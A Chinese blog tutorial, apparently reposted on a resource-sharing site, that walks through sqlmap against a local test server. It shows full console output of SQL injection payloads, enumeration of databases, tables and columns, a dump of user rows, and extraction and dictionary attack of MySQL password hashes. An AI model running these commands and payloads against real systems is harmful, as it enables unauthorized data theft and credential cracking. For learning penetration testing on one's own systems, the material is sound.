SQL注入:探索Sqlmap的魅力。

摘要

SQL注入,让我颤抖!但是有了神器sqlmap,我感觉自己变成了黑客大佬!安装、扫描、查找数据库、表、字段,一步步深入,让我感受到了探险的刺激!

正文

SQL注入:Sqlmap初体验

目录

  • sqlmap
  • 安装
  • 查看帮助文档
  • 中文文档
  • 直连数据库
    • 服务型数据库(mysql)
    • 文件型数据库(sqlite)
  • 初级实战
    • 1. 扫描注入点
    • 2. 根据注入点查到全部数据库 –dbs
    • 3. 根据指定数据库来查所有表
    • 3.根据表来爆字段(mysql版本>5.0)
    • 4. 根据字段名查到表中的数据
    • 5. 获取当前数据库用户及hash密码
  • 最后
    • 参考资料

sqlmap

Sqlmap 是一个开源的渗透测试工具,可以自动检测和利用 SQL 注入缺陷以及接管数据库服务器的过程。它有一个强大的检测引擎,许多针对最终渗透测试人员的小众功能,以及从数据库指纹、从数据库获取数据、访问底层文件系统和通过带外连接在操作系统上执行命令等广泛的开关。

安装

pip install sqlmap

查看帮助文档

sqlmap -hh

中文文档

https://sqlmap.campfire.ga/

直连数据库

服务型数据库(mysql)

DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME

sqlmap -d “mysql://root:123456@127.0.0.1:3306/uniapp_shop” -f –banner –dbs –users

文件型数据库(sqlite)

DBMS://DATABASE_FILEPATH

sqlmap -d “sqlite3://D:\apiTestDjango\db.sqlite3” -f –banner –dbs –tables

初级实战

此处使用的是本地的服务,目的在于学习sqlmap的使用,请不要做违法的事情
扫描项目源码为: https://gitee.com/zy7y/uniapp_shop_server

1. 扫描注入点

命令:sqlmap -u http://127.0.0.1/v1/getnews?newid=1

(venv) D:\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.5.5#pip}
|_ -| . ["]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal l
aws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:34:37 /2021-05-14/

[13:34:37] [INFO] resuming back-end DBMS 'mysql'
[13:34:37] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: newid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: newid=13 AND 6236=6236

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: newid=13 AND (SELECT 8333 FROM (SELECT(SLEEP(5)))cUBu)

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: newid=13 UNION ALL SELECT CONCAT(0x716a6a7a71,0x664e6179557179534a494d4b7a6a4b4263744562646f716151716744516c75476f6774666345424e,0x71786b7a71),NULL,NULL,NULL,NULL-- -
---
[13:34:37] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[13:34:37] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'

[*] ending @ 13:34:37 /2021-05-14/
# Title: Generic UNION query (NULL) - 5 columns 注入点

2. 根据注入点查到全部数据库 –dbs

命令:sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --dbs

(venv) D:\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --dbs
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.5.5#pip}
|_ -| . [']     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal l
aws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:40:12 /2021-05-14/

[13:40:12] [INFO] resuming back-end DBMS 'mysql'
[13:40:12] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: newid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: newid=13 AND 6236=6236

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: newid=13 AND (SELECT 8333 FROM (SELECT(SLEEP(5)))cUBu)

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: newid=13 UNION ALL SELECT CONCAT(0x716a6a7a71,0x664e6179557179534a494d4b7a6a4b4263744562646f716151716744516c75476f6774666345424e,0x71786b7a71),NULL,NULL,NULL,NULL-- -
---
[13:40:12] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[13:40:12] [INFO] fetching database names
available databases [6]:
[*] atplant
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] uniapp_shop

[13:40:12] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'

[*] ending @ 13:40:12 /2021-05-14/

3. 根据指定数据库来查所有表

命令:sqlmap -u http://127.0.0.1/v1/getnews?newid=1 -D uniapp_shop --tables

(venv) D:\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1 -D uniapp_shop --tables
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.5.5#pip}
|_ -| . [(]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal l
aws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:57:46 /2021-05-14/

[14:57:47] [INFO] resuming back-end DBMS 'mysql'
[14:57:47] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: newid (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: newid=1 AND (SELECT 3711 FROM (SELECT(SLEEP(5)))aMmf)

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: newid=1 UNION ALL SELECT NULL,CONCAT(0x7162626b71,0x456a5258416472737a767a5a6d624b5448444b52745770566c4e67646c58666d474376737a6f476c,0x7170706271),NULL,NULL,NULL-- -
---
[14:57:47] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[14:57:47] [INFO] fetching tables for database: 'uniapp_shop'
Database: uniapp_shop
[36 tables]
+----------------------------+
| dt_article                 |
| dt_article_albums          |
| dt_article_attach          |
| dt_article_attribute_field |
| dt_article_attribute_value |
| dt_article_category        |
| dt_article_comment         |
| dt_brands                  |
| dt_channel                 |
| dt_channel_field           |
| dt_channel_site            |
| dt_express                 |
| dt_feedback                |
| dt_link                    |
| dt_mail_template           |
| dt_manager                 |
| dt_manager_log             |
| dt_manager_role            |
| dt_manager_role_value      |
| dt_navigation              |
| dt_order_goods             |
| dt_orders                  |
| dt_payment                 |
| dt_sms_template            |
| dt_user_amount_log         |
| dt_user_attach_log         |
| dt_user_code               |
| dt_user_group_price        |
| dt_user_groups             |
| dt_user_login_log          |
| dt_user_message            |
| dt_user_oauth              |
| dt_user_oauth_app          |
| dt_user_point_log          |
| dt_user_recharge           |
| dt_users                   |
+----------------------------+

[14:57:47] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'

[*] ending @ 14:57:47 /2021-05-14/

3.根据表来爆字段(mysql版本>5.0)

命令:sqlmap -u http://127.0.0.1/v1/getnews?newid=1 -D uniapp_shop -T dt_users --columns

(venv) D:\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1 -D uniapp_shop -T dt_users --columns
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.5.5#pip}
|_ -| . [)]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal l
aws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:59:01 /2021-05-14/

[14:59:01] [INFO] resuming back-end DBMS 'mysql'
[14:59:01] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: newid (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: newid=1 AND (SELECT 3711 FROM (SELECT(SLEEP(5)))aMmf)

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: newid=1 UNION ALL SELECT NULL,CONCAT(0x7162626b71,0x456a5258416472737a767a5a6d624b5448444b52745770566c4e67646c58666d474376737a6f476c,0x7170706271),NULL,NULL,NULL-- -
---
[14:59:01] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[14:59:01] [INFO] fetching columns for table 'dt_users' in database 'uniapp_shop'
Database: uniapp_shop
Table: dt_users
[22 columns]
+-----------+--------------+
| Column    | Type         |
+-----------+--------------+
| exp       | int          |
| address   | varchar(255) |
| amount    | double       |
| area      | varchar(255) |
| avatar    | varchar(255) |
| birthday  | timestamp    |
| email     | varchar(50)  |
| group_id  | int          |
| id        | int          |
| mobile    | varchar(20)  |
| msn       | varchar(100) |
| nick_name | varchar(100) |
| password  | varchar(100) |
| point     | int          |
| qq        | varchar(20)  |
| reg_ip    | varchar(20)  |
| reg_time  | timestamp    |
| salt      | varchar(20)  |
| sex       | varchar(20)  |
| status    | int          |
| telphone  | varchar(50)  |
| user_name | varchar(100) |
+-----------+--------------+

[14:59:02] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'

[*] ending @ 14:59:02 /2021-05-14/

4. 根据字段名查到表中的数据

注意:当使用了–dump 已经触法了法律,请不要恶意攻击他人服务
命令:sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --batch -D uniapp_shop -T dt_users -C user_name,id --dump

(venv) D:\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --batch -D uniapp_shop -T dt_users -C user_name,id --dump
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.5.5#pip}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal l
aws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:03:52 /2021-05-14/

[15:03:52] [INFO] resuming back-end DBMS 'mysql'
[15:03:52] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: newid (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: newid=1 AND (SELECT 3711 FROM (SELECT(SLEEP(5)))aMmf)

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: newid=1 UNION ALL SELECT NULL,CONCAT(0x7162626b71,0x456a5258416472737a767a5a6d624b5448444b52745770566c4e67646c58666d474376737a6f476c,0x7170706271),NULL,NULL,NULL-- -
---
[15:03:52] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[15:03:52] [INFO] fetching entries of column(s) 'id,user_name' for table 'dt_users' in database 'uniapp_shop'
Database: uniapp_shop
Table: dt_users
[1 entry]
+-----------+----+
| user_name | id |
+-----------+----+
| test      | 1  |
+-----------+----+

[15:03:53] [INFO] table 'uniapp_shop.dt_users' dumped to CSV file 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1\dump\uniapp_shop\dt_users.csv'
[15:03:53] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'

[*] ending @ 15:03:53 /2021-05-14/

5. 获取当前数据库用户及hash密码

命令: sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --passwords

(venv) D:\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --passwords
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.5.5#pip}
|_ -| . [']     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal l
aws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:40:02 /2021-05-14/

[14:40:02] [INFO] resuming back-end DBMS 'mysql'
[14:40:02] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: newid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: newid=13 AND 6236=6236

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: newid=13 AND (SELECT 8333 FROM (SELECT(SLEEP(5)))cUBu)

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: newid=13 UNION ALL SELECT CONCAT(0x716a6a7a71,0x664e6179557179534a494d4b7a6a4b4263744562646f716151716744516c75476f6774666345424e,0x71786b7a71),NULL,NULL,NULL,NULL-- -
---
[14:40:02] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[14:40:02] [INFO] fetching database users password hashes
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] y
[14:40:05] [WARNING] no clear password(s) found
database management system users password hashes:
[*] develop [1]:
    password hash: $A$005$~W\\u0005K\\u000b\\u0017d\\u0013\\u0002*4j_s Qg\\u0007\\u0015\\u0001GlIeJWW2iJzFpb0bGTlr5.6kBD1hAQt2iQefbUbepKD
[*] mysql.infoschema [1]:
    password hash: $A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED
[*] mysql.session [1]:
    password hash: $A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED
[*] mysql.sys [1]:
    password hash: $A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED
[*] root [2]:
    password hash: $A$005$\\u0013`|dCsg\\u0001^)_s\\u001dL\\u0010n-jx^61Eh8FZrw86xs/5fy7xSwpJ9rmmaZ9iyou1PCK74aRC
    password hash: $A$005$z#r<]P\\u000eneGN\\u0014P_m\\u0007tk&av.YQwaEJ5AqX5Mv9.OiaWV/IlOiYM.C3veKIaAjpwq3

[14:40:05] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'

[*] ending @ 14:40:05 /2021-05-14/

最后

请不要恶意使用其来攻击他人服务,不要触碰法律,高级用法请查看官方文档

参考资料

sqlmap中文文档
sql注入实战讲解

关注不迷路

扫码下方二维码,关注宇凡盒子公众号,免费获取最新技术内幕!

温馨提示:如果您访问和下载本站资源,表示您已同意只将下载文件用于研究、学习而非其他用途。
文章版权声明 1、本网站名称:宇凡盒子
2、本站文章未经许可,禁止转载!
3、如果文章内容介绍中无特别注明,本网站压缩包解压需要密码统一是:yufanbox.com
4、本站仅供资源信息交流学习,不保证资源的可用及完整性,不提供安装使用及技术服务。点此了解
5、如果您发现本站分享的资源侵犯了您的权益,请及时通知我们,我们会在接到通知后及时处理!提交入口
0

评论0

请先

站点公告

🚀 【宇凡盒子】全网资源库转储中心

👉 注册即送VIP权限👈

👻 全站资源免费下载✅,欢迎注册!

记得 【收藏】+【关注】 谢谢!~~~

立即注册
没有账号?注册  忘记密码?

社交账号快速登录